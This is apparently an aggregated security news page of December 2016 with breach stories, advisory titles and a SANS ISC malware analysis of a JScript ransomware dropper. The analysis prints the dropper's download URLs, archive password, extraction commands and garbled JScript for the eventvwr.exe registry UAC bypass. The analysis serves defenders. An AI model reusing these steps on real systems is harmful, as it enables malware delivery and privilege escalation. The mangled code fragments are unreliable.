(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Someone had faster access to over a billion Yahoo accounts' data. (credit: Scott Schiller)

On December 14, Yahoo announced that after an investigation into data provided by law enforcement officials in November, the company and outside forensics experts have determined that there was in fact a previously undetected breach of data from over 1 billion user accounts. The breach took place in August 2013, and is apparently distinct from the previous mega-breach revealed this fall—one Yahoo claims was conducted by a "state-sponsored actor".

The information accessed from potentially exposed accounts "may have included names, email addresses, telephone numbers, dates of birth, hashed passwords (using MD5) and, in some cases, encrypted or unencrypted security questions and answers," Yahoo's chief information security officer Bob Lord reported in the statement issued by the company. "The investigation indicates that the stolen information did not include passwords in clear text, payment card data, or bank account information. Payment card data and bank account information are not stored in the system the company believes was affected."

It's not clear whether the data provided by law enforcement to Yahoo is connected to samples offered on an underground site this past August, particularly since Yahoo still remains unsure of how the user data was spirited out of its systems in the first place. But the breach news doesn't end there.

Read 4 remaining paragraphs | Comments

 
Multiple IBM Products CVE-2016-8943 Cross Site Scripting Vulnerability
 
Multiple IBM Products CVE-2016-8941 Cross Site Request Forgery Vulnerability
 

Enlarge

Ashley Madison, the dating website for married people seeking extramarital affairs, will pay the Federal Trade Commission (FTC) $1.6 million for its failure to protect the account information of 36 million users, for failing to delete account information after regretful users paid a $19 fee, and for luring users with fake accounts of “female” users.

In a press conference call, FTC Chairwoman Edith Ramirez said the commission had secured a $17.5 million settlement, but the company will only pay $1.6 million of that amount due to inability to pay. Ashley Madison's operators are also required to implement a data security program that will be audited by a third party, according to the settlement.

The website was hacked in August 2015, and the hack resulted in the release of user names, first and last names, hacked passwords, partial credit card data, street names, phone numbers, records of transactions, and e-mail addresses. In the wake of the hack, it was discovered that many people who paid the company $20 for a “Full Delete” had been bilked—Ashley Madison parent company Avid Life Media, now Ruby Corporation, had left that data on its servers for up to 12 months after the request had been made.

Read 4 remaining paragraphs | Comments

 
Adobe Flash Player CVE-2016-7890 Unspecified Security Bypass Vulnerability
 
Adobe Flash Player APSB16-39 Multiple Unspecified Memory Corruption Vulnerabilities
 
Adobe Flash Player APSB16-39 Multiple Unspecified Remote Code Execution Vulnerabilities
 
Apple macOS/iOS/tvOS Multiple Security Vulnerabilities
 
Adobe Animate <= v15.2.1.95 Memory Corruption Vulnerability
 
SAP HANA Cockpit Information Disclosure Vulnerability
 
WebKit CVE-2016-7592 Denial of Service Vulnerability
 
Apple macOS APPLE-SA-2016-12-13-1 Multiple Security Vulnerabilities
 

Enlarge (credit: Sean Rayford/Getty Images / Aurich)

“Through our e-mails and our social media accounts we get death threats all the time,” said Janisha Gabriel. “For anyone who’s involved in this type of work, you know that you take certain risks.”

These aren’t the words of a politician or a prison guard but of a Web designer. Gabriel owns Haki Creatives, a design firm that specializes in building websites for social activist groups like Black Lives Matter (BLM)—and for that work strangers want to kill her.

When these people aren’t hurling threats at the site’s designer, they’re hurling attacks at the BLM site itself—on 117 separate occasions in the past six months, to be precise. They’re renting servers and wielding botnets, putting attack calls out on social media, and trialling different attack methods to see what sticks. In fact, it’s not even clear whether ‘they’ are the people publicly claiming to perform the attacks.

Read 40 remaining paragraphs | Comments

 
Apple iOS/watchOS/macOS CVE-2016-7644 Remote Code Execution Vulnerability
 
SAP Mobile Defense & Security Remote Authorization Bypass Vulnerability
 
SAP HANA Cockpit Cross Site Scripting Vulnerability
 
SAP HANA Remote Authorization Bypass Vulnerability
 
SAP HANA XS Classic Information Disclosure Vulnerability
 
Cisco Email Security Appliance CVE-2016-6465 Remote Security Bypass Vulnerability
 
SAP Netweaver ABAP Remote Authorization Bypass Vulnerability
 
Visonic PowerLink2 Cross Site Scripting And Information Disclosure Vulnerabilities
 
Secunia Research: Microsoft Windows Type 1 Font Processing Vulnerability
 
Apache Struts CVE-2016-8738 Denial of Service Vulnerability
 
Multiple Delta Electronics Products Local Buffer Overflow and Arbitrary File Access Vulnerabilities
 
SAP Netweaver ABAP EA-DFPS Remote Authorization Bypass Vulnerability
 
Joomla! Core CVE-2016-9838 Remote Privilege Escalation Vulnerability
 
Mozilla Firefox MFSA2016-94 and MFSA2016-95 Multiple Security Vulnerabilities
 
CVE-2013-3143: MSIE 9 IEFRAME CMarkup..Remove­Pointer­Pos use-after-free
 
Mozilla Firefox MFSA2016-94 Multiple Security Vulnerabilities
 
Mozilla Firefox ESR CVE-2016-9905 Denial of Service Vulnerability
 

Yesterday, one of our readers sent us a malicious piece of JScript: doc2016044457899656.pdf.js.js. Its always interesting to have a look at samples coming from alternate sources because they may slightly differ from what we usually receive on a daily basis. Only yesterday, my spam trap collected 488 ransomware samples from the different campaigns but always based on the same techniques.

The JScript code was, of course, obfuscated but it was easily read by a human. Usually, there is no need to implement complex obfuscation to bypass AV detection. This sample had a score of 8/54 on VT. What was different? First of all, it just tries to download two files from a remote server:

  • hxxp://45.58.49.54/7za.exe
  • hxxp://45.58.49.54/process.zip

The bad guy was lazy (or smart?) and did not implement"> var AACRSODLXACCGDOLOSOX = LXCTAOHOHSYOAASHNDCA(6D696E617331303030"> 6D696E617331303030.decode(hex)minas1000

The destination path is generated via multiple variables and is finally set to C:\Users\[user]\AppData\Local\, user being the victim"> C:\Users\[user]\AppData\Local\7za.exe x C:\Users\[user]\AppData\Local\COCNOACTXATASGNOTOAS -pminas1000 -o C:\Users\[user]\AppData\Local\

Two new PE files are stored on the file system then executed:

  • processexplorerpe.exe (55c0548290a5dc43bc54a6a15ccd42fd) [2]
  • peprocesss.exe (6b96e8a9c13966086b1e2dd65ac84656) [3]

What makes this sample different? After the classic execution of the PE files, it tries to bypass the Windows UAC using a feature present in eventvwr.exe. This system tool runs as a high integrity process and uses HKCU / HKCR registry hives to start mmc.exe which opens finally eventvwr.msc. More information about this behaviour is available on the Microsoft website[4].

The trick is to create the registry entry that is checked by eventvwr.exe and to store the malicious binary (ODASTATACOTSTAODHOOD"> var WshShell = WScript.CreateObject (WScript.ShellWshShell.RegWrite (HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\\, ODASTATACOTSTAODHOOD, REG_SZ"> var ZLGOZYLOLHONHTXTAOOR = environmentVars(WINDIR) + \\SYSTEM32\\+eventvwr.exeAAOGAODYSCSTSOAOLHAC = new ActiveXObject(Wscript.Shell

Letvar wshShell = new ActiveXObject(WScript.ShellwshShell.Run(REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f

More information about this technique to bypass UAC is available on github.com[5] with a PoC script in Powershell.

If you receive interesting samples, feel free to share them! We always need fresh meat!

[1] http://www.7-zip.org/download.html
[2] https://www.virustotal.com/en/file/305fe0e8e8753dd2bf79fd349760b5c83d75097becc98a541b489bd5456b7b5e/analysis/
[3] https://www.virustotal.com/en/file/7b1f0831ea6943fb1f2a2714f71b16c890baf15c985833e0a590fe6545c7e16f/analysis/
[4] https://msdn.microsoft.com/en-us/library/bb742441.aspx
[5] https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
SIMATIC S7-300 and S7-400 CPUs Denial of Service and Information Disclosure Vulnerabilities
 
MSIE 9 MSHTML CMarkup::ReloadInCompatView use-after-free
 
[slackware-security] mozilla-firefox (SSA:2016-348-01)
 
APPLE-SA-2016-12-13-8 Transporter 1.9.2
 
APPLE-SA-2016-12-13-7 Additional information for APPLE-SA-2016-12-12-2 watchOS 3.1.1
 
Internet Storm Center Infocon Status